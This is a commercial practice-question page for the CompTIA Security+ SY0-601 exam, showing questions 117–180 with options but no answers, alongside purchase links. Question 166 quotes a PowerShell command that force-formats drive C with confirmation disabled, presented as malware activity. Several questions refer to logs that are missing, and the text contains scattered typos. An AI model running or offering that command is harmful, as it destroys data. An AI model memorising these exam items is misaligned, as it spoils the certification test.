A SIEM

Buy Now
Questions 117

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Buy Now
Questions 118

Which of the following agreements defines response time, escalation points, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Buy Now
Questions 119

Which of the following scenarios best describes a risk reduction technique?

Options:

A.

A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches

B.

A security control objective cannot be met through a technical change, so the company implements a pokey to train users on a more secure method of operation

C.

A security control objective cannot be met through a technical change, so the company performs regular audits to determine it violations have occurred

D.

A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Buy Now
Questions 120

Which of the following is the correct order of volatility from most to least volatile?

Options:

A.

Memory, temporary filesystems. routing tables, disk, network storage

B.

Cache, memory, temporary filesystems. disk, archival media

C.

Memory, disk, temporary filesystems. cache, archival media

D.

Cache, disk, temporary filesystems. network storage, archival media

Buy Now
Questions 121

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Buy Now
Questions 122

A software company adopted the following processes before releasing software to production

• Peer review

• Static code scanning

• Signing

A considerable number of vulnerabilities are still being detected when code is executed on production Which of the following security tools can improve vulnerability detection on this environment?

Options:

A.

File integrity monitoring for the source code

B.

Dynamic code analysis tool

C.

Encrypted code repository

D.

Endpoint detection and response solution

Buy Now
Questions 123

An internet company has created a new collaboration application. To expand the user base, the company wants to implement an option that allows users to log in to the application with the

credentials of her popular websites. Which of the following should the company implement?

Options:

A.

SSO

B.

CHAP

C.

802.1X

D.

OpenlD

Buy Now
Questions 124

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Buy Now
Questions 125

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

Options:

A.

Warm site

B.

Generator

C.

Hot site

D.

Cold site

E.

Cloud backups

F.

UPS

Buy Now
Questions 126

A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicioud provider

environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control

and management regardless of the data location. Which of the following would best meet the architect's objectives?

Options:

A.

Trusted Platform Module

B.

laaS

C.

HSMaas

D.

PaaS

Buy Now
Questions 127

A security administrator received an alert for a user account with the following log activity:

Which of the following best describes the trigger for the alert the administrator received?

Options:

A.

Number of failed log-in attempts

B.

Geolocation

C.

Impossible travel time

D.

Time-based log-in attempt

Buy Now
Questions 128

The IT department's on-site developer has been with the team for many years. Each lime an application is released; the security team is able to identify multiple vulnerabilities Which of the Mowing would best help the team ensure the application is ready to be released to production?

Options:

A.

Limit the use of third-party libraries.

B.

Prevent data exposure queries.

C.

Obfuscate the source code

D.

Submit the application to OA before releasing it.

Buy Now
Questions 129

An organization wants to ensure that proprietary information is not inadvertently exposed during facility tours. Which of the following would the organization implement to mitigate this risk?

Options:

A.

Clean desk policy

B.

Background checks

C.

Non-disclosure agreements

D.

Social media analysis

Buy Now
Questions 130

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker most likely attempting?

Options:

A.

A spear-phishing attach

B.

A watering-hole attack

C.

Typo squatting

D.

A phishing attack

Buy Now
Questions 131

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request m an email that has an executive's name m the display held to the email

B.

Employees who open an email attachment receive messages demanding payment m order to access files

C.

A service desk employee receives an email from the HR director asking for log-in credentials lo a cloud administrator account

D.

An employee receives an email with a link to a phishing site that is designed to look like the company's email portal.

Buy Now
Questions 132

Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

Options:

A.

Fog computing

B.

VM escape

C.

Software-defined networking

D.

Image forgery

E.

Container breakout

Buy Now
Questions 133

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

Options:

A.

A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Buy Now
Questions 134

An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to utilize a VPN to corporate resources Which of the following would best maintain high-quality videoconferencing while minimizing latency when connected to the VPN?

Options:

A.

Using geographic diversity lo have VPN terminators closer to end users

B.

Utilizing split tunneling so only traffic for corporate resources is encrypted

C.

Purchasing higher bandwidth connections to meet the increased demand

D.

Configuring OoS properly on the VPN accelerators

Buy Now
Questions 135

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Buy Now
Questions 136

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Buy Now
Questions 137

A security professional wants to enhance the protection of a critical environment that is Used to store and manage a company's encryption keys. The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?

Options:

A.

DLP

B.

HSM

C.

CA

D.

FIM

Buy Now
Questions 138

A company has installed badge readers for building access but is finding unau-thorized individuals roaming the hallways Of the following is the most likely cause?

Options:

A.

Shoulder surfing

B.

Phishing

C.

Tailgating

D.

Identity fraud

Buy Now
Questions 139

Which of the following roles is responsible for defining the protection type and Classification type for a given set of files?

Options:

A.

General counsel

B.

Data owner

C.

Risk manager

D.

Chief Information Officer

Buy Now
Questions 140

An organization is building a new headquarters and has placed fake cameras around the building in an attempt to discourage potential intruders. Which of the following kinds of controls describes this security method?

Options:

A.

Detective

B.

Deterrent

C.

Directive

D.

Corrective

Buy Now
Questions 141

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 142

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab The researchers collaborate with other machines using port 445 and on the internet using port 443 The unau-thorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMS. The security team has been instructed to resolve the issue as quickly as possible while causing minimal disruption to the researchers. Which of the following is the best course Of

action in this scenario?

Options:

A.

Update the host firewalls to block outbound Stv1B.

B.

Place the machines with the unapproved software in containment

C.

Place the unauthorized application in a Bocklist.

D.

Implement a content filter to block the unauthorized software communica-tion,

Buy Now
Questions 143

A financial institution would like to store its customer data in the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution Is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would best meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Buy Now
Questions 144

A large retail store's network was breached recently. and this news was made public. The Store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the Store lost revenue after the breach. Which of the following is the

most likely reason for this issue?

Options:

A.

Employee training

B.

Leadership changes

C.

Reputation

D.

Identity theft

Buy Now
Questions 145

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company's server:

Which of the following best describes this kind of attack?

Options:

A.

Directory traversal

B.

SQL injection

C.

API

D.

Request forgery

Buy Now
Questions 146

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the ‘company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two).

Options:

A.

Federation

B.

Identity proofing

C.

Password complexity

D.

Default password changes

E.

Password manager

F.

Open authentication

Buy Now
Questions 147

You are security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the Infecton and then deny each remaining hosts clean or infected.

Options:

Buy Now
Questions 148

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Buy Now
Questions 149

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would prevent this issue?

Options:

A.

Documenting the new policy in a change request and submitting the request to change management

B.

Testing the policy in a non-production environment before enabling the policy in the production network

C.

Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new policy

D.

Including an "allow any" policy above the "deny any" policy

Buy Now
Questions 150

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Buy Now
Questions 151

Which of the following is most likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

Options:

A.

An RTO report

B.

A risk register

C.

A business impact analysis

D.

An asset value register

E.

A disaster recovery plan

Buy Now
Questions 152

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

Options:

A.

Persistence

B.

Port scanning

C.

Privilege escalation

D.

Pharming

Buy Now
Questions 153

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Buy Now
Questions 154

An attack has occurred against a company.

INSTRUCTIONS

You have been tasked to do the following:

Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output. (Answer Area 1).

Identify which compensating controls should be implemented on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.

(Answer area 2) All objects will be used, but not all placeholders may be filled. Objects may only be used once.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select and Place:

Options:

Buy Now
Questions 155

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 156

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Buy Now
Questions 157

A security analyst is currently addressing an active cyber incident. The analyst has been able to identify affected devices that are running a malicious application with a unique hash. Which of the following is the next step according to the incident response process?

Options:

A.

Recovery

B.

Lessons learned

C.

Containment

D.

Preparation

Buy Now
Questions 158

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tabletop exercise

Buy Now
Questions 159

A company wants to build a new website to sell products online. The website wd I host a storefront application that allow visitors to add products to a shopping cart and pay for products using a credit card. which Of the following protocols •would be most secure to implement?

Options:

A.

SSL

B.

SFTP

C.

SNMP

D.

TLS

Buy Now
Questions 160

To reduce and limit software and infrastructure costs the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have secunty controls to protect sensitive data Which of the following cloud services would best accommodate the request?

Options:

A.

laaS

B.

PaaS

C.

DaaS

D.

SaaS

Buy Now
Questions 161

A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would bast prevent email contents from being released should another breach occur?

Options:

A.

Implement S/MIME to encrypt the emails at rest.

B.

Enable full disk encryption on the mail servers.

C.

Use digital certificates when accessing email via the web.

D.

Configure web traffic to only use TLS-enabled channels.

Buy Now
Questions 162

Which of the following best reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

Options:

A.

Implement proper network access restrictions.

B.

Initiate a bug bounty program.

C.

Classify the system as shadow IT.

D.

Increase the frequency of vulnerability scans.

Buy Now
Questions 163

Which of the following would be used to find the most common web-applicalion vulnerabilities?

Options:

A.

OWASP

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

SDLC

Buy Now
Questions 164

A security analyst needs to implement security features across smartphones. laptops, and tablets. Which of the following would be the most effective across heterogeneous platforms?

Options:

A.

Enforcing encryption

B.

Deploying GPOs

C.

Removing administrative permissions

D.

Applying MDM software

Buy Now
Questions 165

A company needs to centralize its logs to create a baseline and have visibility on its security events Which of the following technologies will accomplish this objective?

Options:

A.

Security information and event management

B.

A web application firewall

C.

A vulnerability scanner

D.

A next-generation firewall

Buy Now
Questions 166

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Buy Now
Questions 167

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 168

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 169

A network penetration tester has successfully gained access to a target machine. Which of the following should the penetration tester do next?

Options:

A.

Clear the log files of all evidence

B.

Move laterally to another machine.

C.

Establish persistence for future use.

D.

Exploit a zero-day vulnerability.

Buy Now
Questions 170

A web server has been compromised due to a ransomware attack. Further Investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

Options:

A.

The last incremental backup that was conducted 72 hours ago

B.

The last known-good configuration stored by the operating system

C.

The last full backup that was conducted seven days ago

D.

The baseline OS configuration

Buy Now
Questions 171

During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Buy Now
Questions 172

A user enters a password to log in to a workstation and is then prompted to enter an authentication code Which of the following MFA factors or attributes are being utilized in the authentication process? {Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Buy Now
Questions 173

Which of the following would be the best resource for a software developer who is looking to improve secure coding practices for web applications?

Options:

A.

OWASP

B.

Vulnerability scan results

C.

NIST CSF

D.

Third-party libraries

Buy Now
Questions 174

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

Options:

A.

DDoS

B.

Privilege escalation

C.

DNS poisoning

D.

Buffer overflow

Buy Now
Questions 175

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

Options:

A.

SaaS

B.

PaaS

C.

laaS

D.

DaaS

Buy Now
Questions 176

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Buy Now
Questions 177

A security analyst is hardening a network infrastructure The analyst is given the following requirements

• Preserve the use of public IP addresses assigned to equipment on the core router

• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select two).

Options:

A.

Configure VLANs on the core router

B.

Configure NAT on the core router.

C.

Configure BGP on the core router

D.

Enable AES encryption on the web server

E.

Enable 3DES encryption on the web server

F.

Enable TLSv2 encryption on the web server

Buy Now
Questions 178

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

Disgruntled employee

Buy Now
Questions 179

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Buy Now
Questions 180

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Buy Now
Exam Code: SY0-601
Exam Name: CompTIA Security+ Exam 2023
Last Update: Mar 24, 2024
Questions: 607
$64  $159.99
$48  $119.99
$40  $99.99
buy now SY0-601